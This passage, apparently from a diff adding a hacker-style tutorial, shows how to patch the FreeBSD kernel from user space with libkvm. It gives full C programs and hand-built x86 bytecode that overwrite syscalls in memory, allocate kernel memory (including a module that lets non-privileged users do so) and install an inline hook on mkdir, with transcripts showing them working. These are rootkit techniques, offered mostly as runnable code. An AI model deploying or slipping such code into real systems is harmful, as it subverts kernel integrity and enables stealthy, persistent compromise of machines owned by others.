+	/* Initialize kernel virtual memory access */
+
+        kd = kvm_openfiles(NULL, NULL, NULL, O_RDWR, errbuf);
+        if(kd == NULL) {
+                fprintf(stderr, "ERROR: %s\n", errbuf);
+                exit(-1);
+        }
+
+
+	/* Find the address of hello and printf */
+
+	nl[0].n_name = "hello";
+	nl[1].n_name = "printf";
+
+	if(kvm_nlist(kd, nl) < 0) {
+                fprintf(stderr, "ERROR: %s\n", kvm_geterr(kd));
+                exit(-1);
+        }
+
+        if(!nl[0].n_value) {
+                fprintf(stderr, "ERROR: Symbol %s not found\n"
+			, nl[0].n_name);
+                exit(-1);
+        }
+
+	if(!nl[1].n_value) {
+                fprintf(stderr, "ERROR: Symbol %s not found\n"
+			, nl[1].n_name);
+                exit(-1);
+        }
+
+
+	/* Calculate the correct offsets */
+
+	offset_1 = nl[0].n_value + OFFSET_1;
+	offset_2 = nl[0].n_value + OFFSET_2;
+
+
+	/* Set the code to contain the correct addresses */
+
+	*(unsigned long *)&code[9] = offset_1;
+	*(unsigned long *)&code[14] = nl[1].n_value - offset_2;
+
+
+	/* Patch hello */
+
+	if(kvm_write(kd, nl[0].n_value, code, sizeof(code)) < 0) {
+        	fprintf(stderr, "ERROR: %s\n", kvm_geterr(kd));
+        	exit(-1);
+	}
+
+	printf("Luke, I am your father!\n");
+
+
+	/* Close kd */
+
+	if(kvm_close(kd) < 0) {
+                fprintf(stderr, "ERROR: %s\n", kvm_geterr(kd));
+                exit(-1);
+        }
+
+        exit(0);
+}
+
+    The only libkvm function that is included in the above program that 
+hasn't been discussed before is kvm_write.
+
+kvm_write:
+
+    This function is used to write to kernel virtual memory. In test_call 
+the syntax was as follows:
+
+	kvm_write(kd, nl[0].n_value, code, sizeof(code))
+
+    The first argument is the descriptor. The second is the address to 
+begin writing to. The third argument is the user-space location to read 
+from. The fourth argument is the number of bytes to read.
+
+    The replacement code (bytecode) in test_call was generated with help of
+objdump.
+
+	[---------------------------------------------------------]
+
+ghost@slavetwo:~#objdump -DR hello.ko | less
+
+hello.ko:     file format elf32-i386-freebsd
+
+Disassembly of section .hash:
+
+00000094 <.hash>:
+  94:   11 00                   adc    %eax,(%eax)
+  96:   00 00                   add    %al,(%eax)
+
+OUTPUT SNIPPED
+
+Disassembly of section .text:
+
+00000500 <hello>:
+ 500:   55                      push   %ebp
+ 501:   89 e5                   mov    %esp,%ebp
+ 503:   83 ec 04                sub    $0x4,%esp
+ 506:   c7 04 24 ed 05 00 00    movl   $0x5ed,(%esp)
+                        509: R_386_RELATIVE     *ABS*
+ 50d:   e8 fc ff ff ff          call   50e <hello+0xe>
+                        50e: R_386_PC32 printf
+ 512:   c7 04 24 ed 05 00 00    movl   $0x5ed,(%esp)
+                        515: R_386_RELATIVE     *ABS*
+ 519:   e8 fc ff ff ff          call   51a <hello+0x1a>
+                        51a: R_386_PC32 printf
+ 51e:   c7 04 24 ed 05 00 00    movl   $0x5ed,(%esp)
+                        521: R_386_RELATIVE     *ABS*
+ 525:   e8 fc ff ff ff          call   526 <hello+0x26>
+                        526: R_386_PC32 printf
+
+OUTPUT SNIPPED
+
+ 57e:   c9                      leave
+ 57f:   31 c0                   xor    %eax,%eax
+ 581:   c3                      ret
+ 582:   8d b4 26 00 00 00 00    lea    0x0(%esi),%esi
+ 589:   8d bc 27 00 00 00 00    lea    0x0(%edi),%edi
+
+	[---------------------------------------------------------]
+
+Note: Your output may vary depending on your compiler version and flags.
+
+    Comparing the output of the text section with the bytecode in test_call
+one can see that they are essentially the same, minus setting up nine more
+calls to printf. An important item to take note of is when objdump reports
+something as being relative. In this case two items are; movl $0x5ed,(%esp)
+(sets up the string to be printed) and call printf. Which brings us to ...
+
+In test_call there are two #define statements, they are:
+
+	#define OFFSET_1        0xed
+	#define OFFSET_2        0x12
+
+    The first represents the address of the string to be printed relative 
+to the beginning of syscall hello (the number is derived from the output of
+objdump). While the second represents the offset of the instruction
+following the call to printf in the bytecode. Later on in test_call there
+are these four statements:
+
+	/* Calculate the correct offsets */
+
+        offset_1 = nl[0].n_value + OFFSET_1;
+        offset_2 = nl[0].n_value + OFFSET_2;
+
+
+        /* Set the code to contain the correct addresses */
+
+        *(unsigned long *)&code[9] = offset_1;
+        *(unsigned long *)&code[14] = nl[1].n_value - offset_2;
+
+    From the comments it should be obvious what these four statements do.
+code[9] is the section in bytecode where the address of the string to be
+printed is stored. code[14] is the operand for the call statement; address
+of printf - address of the next statement.
+
+The following is the output before and after running test_call:
+
+	[---------------------------------------------------------]
+
+ghost@slavetwo:~#ls
+Makefile    hello.c     interface.c test_call.c
+ghost@slavetwo:~#make
+Warning: Object directory not changed from original /usr/home/ghost
+@ -> /usr/src/sys
+machine -> /usr/src/sys/i386/include
+
+OUTPUT SNIPPED
+
+J% objcopy % hello.kld
+ld -Bshareable  -d -warn-common -o hello.ko hello.kld
+objcopy --strip-debug hello.ko
+ghost@slavetwo:~#sudo kldload ./hello.ko
+Password:
+syscall loaded at 210
+ghost@slavetwo:~#gcc -o interface interface.c
+ghost@slavetwo:~#./interface
+FreeBSD Rox!
+FreeBSD Rox!
+FreeBSD Rox!
+FreeBSD Rox!
+FreeBSD Rox!
+FreeBSD Rox!
+FreeBSD Rox!
+FreeBSD Rox!
+FreeBSD Rox!
+FreeBSD Rox!
+ghost@slavetwo:~#gcc -o test_call test_call.c -lkvm
+ghost@slavetwo:~#sudo ./test_call
+Luke, I am your father!
+ghost@slavetwo:~#./interface
+FreeBSD Rox!
+ghost@slavetwo:~#
+
+	[---------------------------------------------------------]
+
+
+--[ 4.0 - Allocating Kernel Memory
+
+    Being able to just patch kernel memory has its limitations since you 
+don't have much room to play with. Being able to allocate kernel memory
+alleviates this problem. The following is a kld which does just that.
+
+kmalloc.c:
+
+/*
+ * Module to allow a non-privileged user to allocate kernel memory
+ *
+ * kmalloc.c,v 2.0 2005/06/01
+ * Date Modified 2005/06/14
+ */
+
+
+#include <sys/types.h>
+#include <sys/param.h>
+#include <sys/proc.h>
+#include <sys/module.h>
+#include <sys/sysent.h>
+#include <sys/kernel.h>
+#include <sys/systm.h>
+#include <sys/malloc.h>
+
+
+/*
+ * Arguments for kmalloc
+ */
+
+struct kma_struct {
+	unsigned long size;
+	unsigned long *addr;
+};
+
+struct kmalloc_args { struct kma_struct *kma; };
+
+/*
+ * The function for implementing kmalloc.
+ */
+
+static int
+kmalloc (struct thread *td, struct kmalloc_args *uap) {
+
+	int error = 1;
+	struct kma_struct kts;
+
+	if(uap->kma) {
+		MALLOC(kts.addr, unsigned long*, uap->kma->size
+		       , M_TEMP, M_NOWAIT);
+		error = copyout(&kts, uap->kma, sizeof(kts));
+	}
+
+	return (error);
+}
+
+/*
+ * The `sysent' for kmalloc
+ */
+
+static struct sysent kmalloc_sysent = {
+	1,			/* sy_narg */
+	kmalloc			/* sy_call */
+};
+
+/*
+ * The offset in sysent where the syscall is allocated.
+ */
+
+static int offset = 210;
+
+/*
+ * The function called at load/unload.
+ */
+
+static int
+load (struct module *module, int cmd, void *arg)
+{
+	int error = 0;
+
+	switch (cmd) {
+	case MOD_LOAD :
+		uprintf ("syscall loaded at %d\n", offset);
+		break;
+	case MOD_UNLOAD :
+		uprintf ("syscall unloaded from %d\n", offset);
+		break;
+	default :
+		error = EOPNOTSUPP;
+		break;
+	}
+	return error;
+}
+
+SYSCALL_MODULE(kmalloc, &offset, &kmalloc_sysent, load, NULL);
+
+The following is the user-space program for the above kld:
+
+interface.c:
+
+/*
+ * User Program To Interact With kmalloc module
+ */
+
+#include <stdio.h>
+#include <sys/syscall.h>
+#include <sys/types.h>
+#include <sys/module.h>
+
+struct kma_struct {
+
+	unsigned long size;
+	unsigned long *addr;
+};
+
+int main(int argc, char **argv) {
+
+	struct kma_struct kma;
+
+	if(argc != 2) {
+		printf("Usage:\n%s <size>\n", argv[0]);
+		exit(0);
+	}
+
+	kma.size = (unsigned long)atoi(argv[1]);
+
+	return syscall(210, &kma);
+}
+
+    Using the techniques/functions described in the previous two sections 
+and the following algorithm coined by Silvio Cesare one can allocate kernel
+memory without the use of a kld.
+
+Silvio Cesare's kmalloc from user-space algorithm:
+
+	1. Get the address of some syscall
+	2. Write a function which will allocate kernel memory
+	3. Save sizeof(our_function) bytes of some syscall
+	4. Overwrite some syscall with our_function
+	5. Call newly overwritten syscall
+	6. Restore syscall
+
+test_kmalloc.c:
+
+/*
+ * Allocate kernel memory from user-space
+ *
+ * Algorithm to allocate kernel memory is as follows:
+ *
+ * 1. Get address of mkdir
+ * 2. Overwrite mkdir with function that calls man 9 malloc()
+ * 3. Call mkdir through int $0x80
+ *    This will cause the kernel to run the new "mkdir" syscall, which will
+ *    call man 9 malloc() and pass out the address of the newly allocated
+ *    kernel memory
+ * 4. Restore mkdir syscall
+ *
+ * test_kmalloc.c,v 2.0 2005/06/24
+ */
+
+
+#include <stdio.h>
+#include <fcntl.h>
+#include <kvm.h>
+#include <nlist.h>
+#include <limits.h>
+#include <sys/types.h>
+#include <sys/syscall.h>
+#include <sys/module.h>
+
+
+/*
+ * Offset of instruction following call statements
+ * Starting at the beginning of the function kmalloc
+ */
+
+#define OFFSET_1	0x3a
+#define OFFSET_2	0x56
+
+
+/*
+ * kmalloc function code
+ */
+
+unsigned char code[] =
+	"\x55"				/* push   %ebp			*/
+	"\xba\x01\x00\x00\x00"		/* mov    $0x1,%edx		*/
+	"\x89\xe5"			/* mov    %esp,%ebp		*/
+	"\x53"				/* push   %ebx			*/
+	"\x83\xec\x14"			/* sub    $0x14,%esp		*/
+	"\x8b\x5d\x0c"			/* mov    0xc(%ebp),%ebx	*/
+	"\x8b\x03"			/* mov    (%ebx),%eax		*/
+	"\x85\xc0"			/* test   %eax,%eax		*/
+	"\x75\x0b"			/* jne    20 <kmalloc+0x20>	*/
+	"\x83\xc4\x14"			/* add    $0x14,%esp		*/
+	"\x89\xd0"			/* mov    %edx,%eax		*/
+	"\x5b"				/* pop    %ebx			*/
+	"\xc9"				/* leave			*/
+	"\xc3"				/* ret				*/
+	"\x8d\x76\x00"			/* lea    0x0(%esi),%esi	*/
+	"\xc7\x44\x24\x08\x01\x00\x00"	/* movl   $0x1,0x8(%esp)	*/
+	"\x00"
+	"\xc7\x44\x24\x04\x00\x00\x00"	/* movl   $0x0,0x4(%esp)	*/
+	"\x00"
+	"\x8b\x00"			/* mov    (%eax),%eax		*/
+	"\x89\x04\x24"			/* mov    %eax,(%esp)		*/
+	"\xe8\xfc\xff\xff\xff"		/* call   36 <kmalloc+0x36>	*/
+	"\x89\x45\xf8"			/* mov    %eax,0xfffffff8(%ebp)	*/
+	"\xc7\x44\x24\x08\x08\x00\x00"	/* movl   $0x8,0x8(%esp)	*/
+	"\x00"
+	"\x8b\x03"			/* mov    (%ebx),%eax		*/
+	"\x89\x44\x24\x04"		/* mov    %eax,0x4(%esp)	*/
+	"\x8d\x45\xf4"			/* lea    0xfffffff4(%ebp),%eax	*/
+	"\x89\x04\x24"			/* mov    %eax,(%esp)		*/
+	"\xe8\xfc\xff\xff\xff"		/* call   52 <kmalloc+0x52>	*/
+	"\x83\xc4\x14"			/* add    $0x14,%esp		*/
+	"\x89\xc2"			/* mov    %eax,%edx		*/
+	"\x5b"				/* pop    %ebx			*/
+	"\xc9"				/* leave			*/
+	"\x89\xd0"			/* mov    %edx,%eax		*/
+	"\xc3";				/* ret				*/
+
+
+/*
+ * struct used to store kernel address
+ */
+
+struct kma_struct {
+
+        unsigned long size;
+        unsigned long *addr;
+};
+
+
+int main(int argc, char **argv) {
+
+	int i = 0;
+	char errbuf[_POSIX2_LINE_MAX];
+	kvm_t *kd;
+	u_int32_t offset_1;
+	u_int32_t offset_2;
+	struct nlist nl[] =
+			  {{ NULL },{ NULL },{ NULL },{ NULL },{ NULL },};
+	unsigned char origcode[sizeof(code)];
+	struct kma_struct kma;
+
+
+	if(argc != 2) {
+                printf("Usage:\n%s <size>\n", argv[0]);
+                exit(0);
+        }
+
+
+	/* Initialize kernel virtual memory access */
+
+	kd = kvm_openfiles(NULL, NULL, NULL, O_RDWR, errbuf);
+	if(kd == NULL) {
+		fprintf(stderr, "ERROR: %s\n", errbuf);
+		exit(-1);
+	}
+
+
+	/* Find the address of mkdir, M_TEMP, malloc, and copyout */
+
+	nl[0].n_name = "mkdir";
+	nl[1].n_name = "M_TEMP";
+	nl[2].n_name = "malloc";
+	nl[3].n_name = "copyout";
+
+	if(kvm_nlist(kd, nl) < 0) {
+                fprintf(stderr, "ERROR: %s\n", kvm_geterr(kd));
+                exit(-1);
+        }
+
+	for(i = 0; i < 4; i++) {
+		if(!nl[i].n_value) {
+                	fprintf(stderr, "ERROR: Symbol %s not found\n"
+				, nl[i].n_name);
+                	exit(-1);
+        	}
+	}
+
+
+	/* Calculate the correct offsets */
+
+	offset_1 = nl[0].n_value + OFFSET_1;
+	offset_2 = nl[0].n_value + OFFSET_2;
+
+
+	/* Set the code to contain the correct addresses */
+
+	*(unsigned long *)&code[44] = nl[1].n_value;
+	*(unsigned long *)&code[54] = nl[2].n_value - offset_1;
+	*(unsigned long *)&code[82] = nl[3].n_value - offset_2;
+
+
+	/* Save mkdir syscall */
+
+	if(kvm_read(kd, nl[0].n_value, origcode, sizeof(code)) < 0) {
+		fprintf(stderr, "ERROR: %s\n", kvm_geterr(kd));
+		exit(-1);
+	}
+
+
+	/* Patch mkdir */
+
+	if(kvm_write(kd, nl[0].n_value, code, sizeof(code)) < 0) {
+		fprintf(stderr, "ERROR: %s\n", kvm_geterr(kd));
+		exit(-1);
+	}
+
+
+	/* Allocate kernel memory */
+
+	kma.size = (unsigned long)atoi(argv[1]);
+	syscall(136, &kma);
+	printf("Address of kernel memory: 0x%x\n", kma.addr);
+
+
+	/* Restore mkdir */
+
+	if(kvm_write(kd, nl[0].n_value, origcode, sizeof(code)) < 0) {
+		fprintf(stderr, "ERROR: %s\n", kvm_geterr(kd));
+		exit(-1);
+	}
+
+
+	/* Close kd */
+
+	if(kvm_close(kd) < 0) {
+		fprintf(stderr, "ERROR: %s\n", kvm_geterr(kd));
+		exit(-1);
+	}
+
+	exit(0);
+}
+
+Using ddb one can verify the results of the above program as follows:
+
+	[---------------------------------------------------------]
+
+ghost@slavetwo:~#ls
+test_kmalloc.c
+ghost@slavetwo:~#gcc -o test_kmalloc test_kmalloc.c -lkvm
+ghost@slavetwo:~#sudo ./test_kmalloc
+Usage:
+./test_kmalloc <size>
+ghost@slavetwo:~#sudo ./test_kmalloc 10
+Address of kernel memory: 0xc2580870
+ghost@slavetwo:~#KDB: enter: manual escape to debugger
+[thread pid 12 tid 100004 ]
+Stopped at      kdb_enter+0x32: leave
+db> examine/x 0xc2580870
+0xc2580870:     70707070
+db>
+0xc2580874:     70707070
+db>
+0xc2580878:     dead7070
+db> c
+
+ghost@slavetwo:~#
+
+	[---------------------------------------------------------]
+
+
+--[ 5.0 - Putting It All Together
+
+    Knowing how to patch and allocate kernel memory gives one a lot of 
+freedom. This last section will demonstrate how to apply a call hook using
+the techniques described in the previous sections. Typically call hooks on
+FreeBSD are done by changing the sysent and having it point to another
+function, we will not be doing this. Instead we will be using the following
+algorithm (with a few minor twists, shown later):
+
+	1. Copy syscall we want to hook
+	2. Allocate kernel memory (use technique described in previous
+	   section)
+	3. Place new routine in newly allocated address space
+	4. Overwrite first 7 bytes of syscall with an instruction to jump
+	   to new routine
+	5. Execute new routine, plus the first x bytes of syscall (this
+	   step will become clearer later)
+	6. Jump back to syscall + offset
+	   Where offset is equal to x
+
+    Stealing an idea from pragmatic of THC we will hook mkdir to print out 
+a debug message. The following is the kld used in conjunction with objdump
+in order to extract the bytecode required for the call hook.
+
+hacked_mkdir.c:
+
+/*
+ * mkdir call hook
+ *
+ * Prints a simple debugging message
+ */
+
+
+#include <sys/types.h>
+#include <sys/param.h>
+#include <sys/proc.h>
+#include <sys/module.h>
+#include <sys/sysent.h>
+#include <sys/kernel.h>
+#include <sys/systm.h>
+#include <sys/linker.h>
+#include <sys/sysproto.h>
+#include <sys/syscall.h>
+
+
+/* The hacked system call */
+
+static int
+hacked_mkdir (struct proc *p, struct mkdir_args *uap) {
+
+	uprintf ("MKDIR SYSCALL : %s\n", uap->path);
+	return 0;
+}
+
+
+/* The sysent for the hacked system call */
+
+static struct sysent
+hacked_mkdir_sysent = {
+	1,		/* sy_narg */
+	hacked_mkdir	/* sy_call */
+};
+
+
+/* The offset in sysent where the syscall is allocated */
+
+static int offset = NO_SYSCALL;
+
+
+/* The function called at load/unload */
+
+static int
+load (struct module *module, int cmd, void *arg) {
+	int error = 0;
+
+	switch (cmd) {
+	case MOD_LOAD :
+		uprintf ("syscall loaded at %d\n", offset);
+		break;
+	case MOD_UNLOAD :
+		uprintf ("syscall unloaded from %d\n", offset);
+		break;
+	default :
+		error = EINVAL;
+		break;
+	}
+	return error;
+}
+
+SYSCALL_MODULE(hacked_mkdir, &offset, &hacked_mkdir_sysent, load, NULL);
+
+    The following is an example program which hooks mkdir to print out a 
+simple debug message. As always an explanation of any new concepts appears 
+after the source code listing.
+
+test_hook.c:
+
+/*
+ * Intercept mkdir system call, printing out a debug message before
+ * executing mkdir.
+ *
+ * Algorithm is as follows:
+ * 1. Copy mkdir syscall upto but not including \xe8.
+ * 2. Allocate kernel memory.
+ * 3. Place new routine in newly allocated address space.
+ * 4. Overwrite first 7 bytes of mkdir syscall with an instruction to jump
+ *    to new routine.
+ * 5. Execute new routine, plus the first x bytes of mkdir syscall.
+ *    Where x is equal to the number of bytes copied from step 1.
+ * 6. Jump back to mkdir syscall + offset.
+ *    Where offset is equal to the location of \xe8.
+ *
+ * test_hook.c,v 3.0 2005/07/02
+ */
+
+#include <stdio.h>
+#include <fcntl.h>
+#include <kvm.h>
+#include <nlist.h>
+#include <limits.h>
+#include <sys/types.h>
+#include <sys/syscall.h>
+#include <sys/module.h>
+
+
+
+/*
+ * Offset of instruction following call statements
+ * Starting at the beginning of the function kmalloc
+ */
+
+#define KM_OFFSET_1	0x3a
+#define KM_OFFSET_2	0x56
+
+/*
+ * kmalloc function code
+ */
+
+unsigned char km_code[] =
+	"\x55"				/* push   %ebp			*/
+	"\xba\x01\x00\x00\x00"		/* mov    $0x1,%edx		*/
+	"\x89\xe5"			/* mov    %esp,%ebp		*/
+	"\x53"				/* push   %ebx			*/
+	"\x83\xec\x14"			/* sub    $0x14,%esp		*/
+	"\x8b\x5d\x0c"			/* mov    0xc(%ebp),%ebx	*/
+	"\x8b\x03"			/* mov    (%ebx),%eax		*/
+	"\x85\xc0"			/* test   %eax,%eax		*/
+	"\x75\x0b"			/* jne    20 <kmalloc+0x20>	*/
+	"\x83\xc4\x14"			/* add    $0x14,%esp		*/
+	"\x89\xd0"			/* mov    %edx,%eax		*/
+	"\x5b"				/* pop    %ebx			*/
+	"\xc9"				/* leave			*/
+	"\xc3"				/* ret				*/
+	"\x8d\x76\x00"			/* lea    0x0(%esi),%esi	*/
+	"\xc7\x44\x24\x08\x01\x00\x00"	/* movl   $0x1,0x8(%esp)	*/
+	"\x00"
+	"\xc7\x44\x24\x04\x00\x00\x00"	/* movl   $0x0,0x4(%esp)	*/
+	"\x00"
+	"\x8b\x00"			/* mov    (%eax),%eax		*/
+	"\x89\x04\x24"			/* mov    %eax,(%esp)		*/
+	"\xe8\xfc\xff\xff\xff"		/* call   36 <kmalloc+0x36>	*/
+	"\x89\x45\xf8"			/* mov    %eax,0xfffffff8(%ebp)	*/
+	"\xc7\x44\x24\x08\x08\x00\x00"	/* movl   $0x8,0x8(%esp)	*/
+	"\x00"
+	"\x8b\x03"			/* mov    (%ebx),%eax		*/
+	"\x89\x44\x24\x04"		/* mov    %eax,0x4(%esp)	*/
+	"\x8d\x45\xf4"			/* lea    0xfffffff4(%ebp),%eax	*/
+	"\x89\x04\x24"			/* mov    %eax,(%esp)		*/
+	"\xe8\xfc\xff\xff\xff"		/* call   52 <kmalloc+0x52>	*/
+	"\x83\xc4\x14"			/* add    $0x14,%esp		*/
+	"\x89\xc2"			/* mov    %eax,%edx		*/
+	"\x5b"				/* pop    %ebx			*/
+	"\xc9"				/* leave			*/
+	"\x89\xd0"			/* mov    %edx,%eax		*/
+	"\xc3";				/* ret				*/
+
+
+
+/*
+ * Offset of instruction following call statements
+ * Starting at the beginning of the function hacked_mkdir
+ */
+
+#define HA_OFFSET_1	0x2f
+
+/*
+ * hacked_mkdir function code
+ */
+
+unsigned char ha_code[] =
+	"\x4d"				/* M				*/
+	"\x4b"				/* K				*/
+	"\x44"				/* D				*/
+	"\x49"				/* I				*/
+	"\x52"				/* R				*/
+	"\x20"				/* sp				*/
+	"\x53"				/* S				*/
+	"\x59"				/* Y				*/
+	"\x53"				/* S				*/
+	"\x43"				/* C				*/
+	"\x41"				/* A				*/
+	"\x4c"				/* L				*/
+	"\x4c"				/* L				*/
+	"\x20"				/* sp				*/
+	"\x3a"				/* :				*/
+	"\x20"				/* sp				*/
+	"\x25"				/* %				*/
+	"\x73"				/* s				*/
+	"\x0a"				/* nl				*/
+	"\x00"				/* null				*/
+	"\x55"				/* push   %ebp			*/
+	"\x89\xe5"			/* mov    %esp,%ebp		*/
+	"\x83\xec\x08"			/* sub    $0x8,%esp		*/
+	"\x8b\x45\x0c"			/* mov    0xc(%ebp),%eax	*/
+	"\x8b\x00"			/* mov    (%eax),%eax		*/
+	"\xc7\x04\x24\x0d\x00\x00\x00"	/* movl   $0xd,(%esp)		*/
+	"\x89\x44\x24\x04"		/* mov    %eax,0x4(%esp)	*/
+	"\xe8\xfc\xff\xff\xff"		/* call   17 <hacked_mkdir+0x17>*/
+	"\x31\xc0"			/* xor    %eax,%eax		*/
+	"\x83\xc4\x08"			/* add    $0x8,%esp		*/
+	"\x5d";				/* pop    %ebp			*/
+
+
+
+/*
+ * jump code
+ */
+
+unsigned char jp_code[] =
+	"\xb8\x00\x00\x00\x00"		/* movl   $0,%eax		*/
+	"\xff\xe0";			/* jmp    *%eax			*/
+
+
+
+/*
+ * struct used to store kernel address
+ */
+
+struct kma_struct {
+
+        unsigned long size;
+        unsigned long *addr;
+};
+
+
+
+int main(int argc, char **argv) {
+
+	int i = 0;
+	char errbuf[_POSIX2_LINE_MAX];
+	kvm_t *kd;
+	u_int32_t km_offset_1;
+	u_int32_t km_offset_2;
+	u_int32_t ha_offset_1;
+	struct nlist nl[] =
+	{ { NULL },{ NULL },{ NULL },{ NULL },{ NULL },{ NULL},{ NULL }, };
+	unsigned long diff;
+	int position;
+	unsigned char orig_code[sizeof(km_code)];
+	struct kma_struct kma;
+
+
+
+	/* Initialize kernel virtual memory access */
+
+	kd = kvm_openfiles(NULL, NULL, NULL, O_RDWR, errbuf);
+	if(kd == NULL) {
+		fprintf(stderr, "ERROR: %s\n", errbuf);
+		exit(-1);
+	}
+
+	/* Find the address of mkdir, M_TEMP, malloc, copyout,
+	   uprintf, and kern_rmdir */
+
+	nl[0].n_name = "mkdir";
+	nl[1].n_name = "M_TEMP";
+	nl[2].n_name = "malloc";
+	nl[3].n_name = "copyout";
+	nl[4].n_name = "uprintf";
+	nl[5].n_name = "kern_rmdir";
+
+	if(kvm_nlist(kd, nl) < 0) {
+                fprintf(stderr, "ERROR: %s\n", kvm_geterr(kd));
+                exit(-1);
+        }
+
+	for(i = 0; i <= 5; i++) {
+		if(!nl[i].n_value) {
+                	fprintf(stderr, "ERROR: Symbol %s not found\n"
+				, nl[i].n_name);
+                	exit(-1);
+        	}
+	}
+
+
+
+	/* Determine size of mkdir syscall */
+
+	diff = nl[5].n_value - nl[0].n_value;
+	unsigned char mk_code[diff];
+
+	/* Save a copy of mkdir syscall */
+
+	if(kvm_read(kd, nl[0].n_value, mk_code, diff) < 0) {
+		fprintf(stderr, "ERROR: %s\n", kvm_geterr(kd));
+		exit(-1);
+	}
+
+	/* Determine position of 0xe8 */
+
+	for(i = 0; i < (int)diff; i++) {
+		if(mk_code[i] == 0xe8) {
+			position = i;
+		}
+	}
+
+
+
+	/* Calculate the correct offsets for kmalloc */
+
+	km_offset_1 = nl[0].n_value + KM_OFFSET_1;
+	km_offset_2 = nl[0].n_value + KM_OFFSET_2;
+
+	/* Set the km_code to contain the correct addresses */
+
+	*(unsigned long *)&km_code[44] = nl[1].n_value;
+	*(unsigned long *)&km_code[54] = nl[2].n_value - km_offset_1;
+	*(unsigned long *)&km_code[82] = nl[3].n_value - km_offset_2;
+
+	/* Save mkdir syscall */
+
+	if(kvm_read(kd, nl[0].n_value, orig_code, sizeof(km_code)) < 0) {
+		fprintf(stderr, "ERROR: %s\n", kvm_geterr(kd));
+		exit(-1);
+	}
+
+	/* Replace mkdir with kmalloc */
+
+	if(kvm_write(kd, nl[0].n_value, km_code, sizeof(km_code)) < 0) {
+		fprintf(stderr, "ERROR: %s\n", kvm_geterr(kd));
+		exit(-1);
+	}
+
+	/* Allocate kernel memory */
+
+	kma.size = (unsigned long)sizeof(ha_code) + (unsigned long)position
+		   + (unsigned long)sizeof(jp_code);
+	syscall(136, &kma);
+
+	/* Restore mkdir */
+
+	if(kvm_write(kd, nl[0].n_value, orig_code, sizeof(km_code)) < 0) {
+		fprintf(stderr, "ERROR: %s\n", kvm_geterr(kd));
+		exit(-1);
+	}
+
+
+
+	/* Calculate the correct offsets for hacked_mkdir */
+
+	ha_offset_1 = (unsigned long)kma.addr + HA_OFFSET_1;
+
+	/* Set the ha_code to contain the correct addresses */
+
+	*(unsigned long *)&ha_code[34] = (unsigned long)kma.addr;
+	*(unsigned long *)&ha_code[43] = nl[4].n_value - ha_offset_1;
+
+	/* Place hacked_mkdir routine into kernel memory */
+
+	if(kvm_write(kd, (unsigned long)kma.addr, ha_code, sizeof(ha_code))
+	   < 0) {
+		fprintf(stderr, "ERROR: %s\n", kvm_geterr(kd));
+		exit(-1);
+	}
+
+	/* Place mk_code into kernel memory */
+
+	if(kvm_write(kd, (unsigned long)kma.addr +
+	  (unsigned long)sizeof(ha_code) - 1, mk_code, position) < 0) {
+		fprintf(stderr, "ERROR: %s\n", kvm_geterr(kd));
+		exit(-1);
+	}
+
+	/* Set the jp_code to contain the correct address */
+
+	*(unsigned long *)&jp_code[1] = nl[0].n_value +
+					(unsigned long)position;
+
+	/* Place jump code into kernel memory */
+
+	if(kvm_write(kd, (unsigned long)kma.addr +
+	                 (unsigned long)sizeof(ha_code) - 1 +
+			 (unsigned long)position
+			 , jp_code, sizeof(jp_code)) < 0) {
+		fprintf(stderr, "ERROR: %s\n", kvm_geterr(kd));
+		exit(-1);
+	}
+
+
+
+	/* Set the jp_code to contain the correct address */
+
+	*(unsigned long *)&jp_code[1] = (unsigned long)kma.addr + 0x14;
+
+	if(kvm_write(kd, nl[0].n_value, jp_code, sizeof(jp_code)) < 0) {
+		fprintf(stderr, "ERROR: %s\n", kvm_geterr(kd));
+		exit(-1);
+	}
+
+	printf("I love the PowerGlove. It's so bad!\n");
+
+
+
+	/* Close kd */
+
+	if(kvm_close(kd) < 0) {
+		fprintf(stderr, "ERROR: %s\n", kvm_geterr(kd));
+		exit(-1);
+	}
+
+	exit(0);
+}
+
+The comments state that the algorithm for this program is as follows:
+
+1. Copy mkdir syscall upto but not including \xe8.
+2. Allocate kernel memory.
+3. Place new routine in newly allocated address space.
+4. Overwrite first 7 bytes of mkdir syscall with an instruction to jump
+   to new routine.
+5. Execute new routine, plus the first x bytes of mkdir syscall.
+   Where x is equal to the number of bytes copied from step 1.
+6. Jump back to mkdir syscall + offset.
+   Where offset is equal to the location of \xe8.
+
+    The reason behind copying mkdir upto but not including \xe8 is because
+on different builds of FreeBSD the disassembly of the mkdir syscall is
+different. Therefore one cannot determine a static location to jump back
+to. However, on all builds of FreeBSD mkdir makes a call to kern_mkdir,
+thus we choose to jump back to that point. The following illustrates this.
+
+	[---------------------------------------------------------]
+
+ghost@slavezero:~#nm /boot/kernel/kernel | grep mkdir
+c047c560 T devfs_vmkdir
+c0620e40 t handle_written_mkdir
+c0556ca0 T kern_mkdir
+c0557030 T mkdir
+c071d57c B mkdirlisthd
+c048a3e0 t msdosfs_mkdir
+c05e2ed0 t nfs4_mkdir
+c05d8710 t nfs_mkdir
+c05f9140 T nfsrv_mkdir
+c06b4856 r nfsv3err_mkdir
+c063a670 t ufs_mkdir
+c0702f40 D vop_mkdir_desc
+c0702f64 d vop_mkdir_vp_offsets
+ghost@slavezero:~#nm /boot/kernel/kernel | grep kern_rmdir
+c0557060 T kern_rmdir
+ghost@slavezero:~#objdump -d --start-address=0xc0557030
+--stop-address=0xc0557060 /boot/kernel/kernel | less
+
+/boot/kernel/kernel:     file format elf32-i386-freebsd
+
+Disassembly of section .text:
+
+c0557030 <mkdir>:
+c0557030:       55                      push   %ebp
+c0557031:       31 c9                   xor    %ecx,%ecx
+c0557033:       89 e5                   mov    %esp,%ebp
+c0557035:       83 ec 10                sub    $0x10,%esp
+c0557038:       8b 55 0c                mov    0xc(%ebp),%edx
+c055703b:       8b 42 04                mov    0x4(%edx),%eax
+c055703e:       89 4c 24 08             mov    %ecx,0x8(%esp)
+c0557042:       89 44 24 0c             mov    %eax,0xc(%esp)
+c0557046:       8b 02                   mov    (%edx),%eax
+c0557048:       89 44 24 04             mov    %eax,0x4(%esp)
+c055704c:       8b 45 08                mov    0x8(%ebp),%eax
+c055704f:       89 04 24                mov    %eax,(%esp)
+c0557052:       e8 49 fc ff ff          call   c0556ca0 <kern_mkdir>
+c0557057:       c9                      leave  
+c0557058:       c3                      ret    
+c0557059:       8d b4 26 00 00 00 00    lea    0x0(%esi),%esi
+
+ghost@slavezero:~#
+
+	[---------------------------------------------------------]
+
+
+	[---------------------------------------------------------]
+
+ghost@slavetwo:~#nm /boot/kernel/kernel | grep mkdir
+c046f680 T devfs_vmkdir
+c0608fd0 t handle_written_mkdir
+c05415d0 T kern_mkdir
